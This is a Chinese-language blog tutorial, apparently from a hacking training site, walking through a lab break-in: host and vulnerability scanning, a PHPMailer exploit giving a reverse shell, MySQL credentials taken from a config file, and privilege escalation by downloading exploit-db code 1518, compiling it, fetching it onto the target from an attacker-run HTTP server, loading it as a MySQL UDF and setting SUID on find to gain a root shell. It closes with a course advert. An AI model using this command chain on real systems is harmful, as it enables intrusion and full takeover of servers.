1、Mysql提权简介
我们都知道网站所用脚本之间的不同权限也就大概的可以看出来,jsp 的默认权限一般都是 system 权限,而 aspx 的一般来说都高于 user 权限,一般来说。asp 和 PHP 的权限差不多,Pl ,cgi ,py 的权限一般和 Aspx 的差不多,MySQL 数据库提权之前,也就是最重要的一点,我们要知道 root 账号和密码,这个也就是最重要的,因为他有写入权限啊!!!
一般获取 root 账号密码主要分为 这几个突破口 : 数据库配置文件、端口破解口令、下载数据库文件获取等
。
2、mysql实战提权操作
1)、首先,我们如果拿到目标站,第一步可以通过masscan工具扫描目标主机的80端口,探测到存活机器,命令和数据如下:
masscan 192.168.42.0/24 -p80Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-03-11 09:17:21 GMT-- forced options: -sS -Pn -n --randomize-hosts -v --send-ethInitiating SYN Stealth ScanScanning 256 hosts [1 port/host]Discovered open port 80/tcp on 192.168.42.8
2)、接着我们就用nmap工具搜集探测一下漏洞,这里用到了nmap的脚本,数据和命令如下:
nmap -T5 -A 192.168.42.8 --script=vulnStarting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 17:22 CSTNmap scan report for 192.168.42.8Host is up (0.00059s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)|_clamav-exec: ERROR: Script execution failed (use -d to debug)80/tcp open http Apache httpd 2.4.10 ((Debian))|_clamav-exec: ERROR: Script execution failed (use -d to debug)| http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.42.8
3)、接着基本的操作就是我们的目录扫描,我们这里可以用到常见的御剑扫描工具。看看有没有什么敏感的信息和文件
![e542181d9744b73c8f4be49c9d9cc2bf.png](https://i-blog.csdnimg.cn/blog_migrate/2faa200a4ff067f6880db9b7b77639ea.jpeg)
通过目录扫描,我们发现了目录遍历漏洞,根据我们黑客渗透的经验,我们可以从中查看一些敏感的信息和重要文件,对我们后面的黑客渗透给予很大的帮助
![5be2a145dd4435fa15051891f6627460.png](https://i-blog.csdnimg.cn/blog_migrate/dc60378385224546275b643888e95651.jpeg)
在查看目录的时候,通过看这个dist文件,我们得知看见目标网站是PHPMailer的程序,通过找其中的信息,发现是5.2.16版本的
![da55c8bd8df18ef3bb7175f651e20ad8.png](https://i-blog.csdnimg.cn/blog_migrate/4e71fde498cbe6b68f37939ed4f1802c.jpeg)
那么我们就可以在百度搜索一下相关的漏洞,也可以通过Kali Linux渗透系统这里就通过searchsploit 工具搜索到相关漏洞的漏洞攻击脚本
执行searchsploit 命令:searchsploit PHPMailer搜索出相关的漏洞exp
![84d33924767d8b4e1a100d1adb4f8fc7.png](https://i-blog.csdnimg.cn/blog_migrate/6513ff0cdaee193166738c8c271f5c5d.jpeg)
由于exp是python编写的,我们这里要安装一下相关的python库
执行命令:pip install requests-toolbelt安装requests-toolbelt库
4)、经过exp成功反弹拿到shell
![090152737fab61a1a3737391fb81cc10.png](https://i-blog.csdnimg.cn/blog_migrate/a5fe8dd0195016baf7d0a8b9ba9920a9.jpeg)
执行命令python -c 'import pty;pty.spawn("/bin/bash")'添加python伪终端,可以看到权限为www权限,那么这里我们就需要去进行一方面的提权提升
![eba238b18dec2f391ddfdf8965c0176e.png](https://i-blog.csdnimg.cn/blog_migrate/4b4fe63abfc4283e94bfec988e95b8ca.jpeg)
通过翻php的配置文件,看到了mysql的账号密码
![56725cef830120063ab41307112f3fe5.png](https://i-blog.csdnimg.cn/blog_migrate/1dc6b6a66b113f97c200b84ce3ec439f.jpeg)
查看一下相关的启动,发现mysql是以root启动
![8b45b0f1163903bbca4c99ced3d828b1.png](https://i-blog.csdnimg.cn/blog_migrate/30036e34f5a987b642c49b9db7803b42.jpeg)
我们可以打开mysql查看版本
![4afc4e8db4a26749eba85d1cc1dcb1a2.png](https://i-blog.csdnimg.cn/blog_migrate/e3c1ae94590d61dadb9211f45f09a18e.jpeg)
5)、下载提权exp在kali上面,编译在kali上编译
执行wget https://www.exploit-db.com/download/1518 下载提权的exp代码
接着执行gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
得到1518.so文件
![87b6f0c186f2ef3761f50e4e12def644.png](https://i-blog.csdnimg.cn/blog_migrate/41e1b82e285cc780f94b9798997f4b37.jpeg)
然后在kali上创建临时服务,执行命令python -m SimpleHTTPServer 8081开启一个http
我们接着在靶机上执行先切换到/tmp目录下
执行命令wget http://192.168.42.4:8081/1518.so 下载好我们刚才编译好的exp
![b8cdfd64f9ea2e9343fe5ff410860700.png](https://i-blog.csdnimg.cn/blog_migrate/9096b7de46a5affac27ad69486f87628.jpeg)
下载完成
![8ddfdaae00dae041c5ae9e6217652336.png](https://i-blog.csdnimg.cn/blog_migrate/2c92a134a6a0dce8c2fd6cccc44b9507.jpeg)
下载完了我们就再次登录数据库执行以下命令
use mysql;create table foo(line blob);insert into foo values(load_file('/tmp/1518.so'));select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';create function do_system returns integer soname '1518.so';select * from mysql.func;select do_system('chmod u+s /usr/bin/find');find ./ -exec "/bin/sh" ;
最后可以看见,提权成功。
![cc8ffdf07cb5808009a23eaf217a9e89.png](https://i-blog.csdnimg.cn/blog_migrate/6875bf8bff2f3a1274de7ff9833df052.jpeg)
为什么选择安界网?
安界网贯彻人才培养理念,结合专业研发团队,打造课程内容体系,推进实训平台发展,通过一站式成长计划、推荐就业以及陪护指导的师带徒服务,为学员的继续学习和职业发展保驾护航,真正实现和完善网络安全精英的教练场平台;
关注私信‘资料’
如果你想实现进高企、就高职、拿高薪,即使低学历也可实现职业发展中的第一个“弯道超车”!安界网就是你唯一选择,赶紧私信我!等你来!
点击关注我的头条号,0基础掌握更多黑客秘籍
私信回复‘’资料‘’领取更多技术文章和学习资料,加入专属的安全学习圈一起进步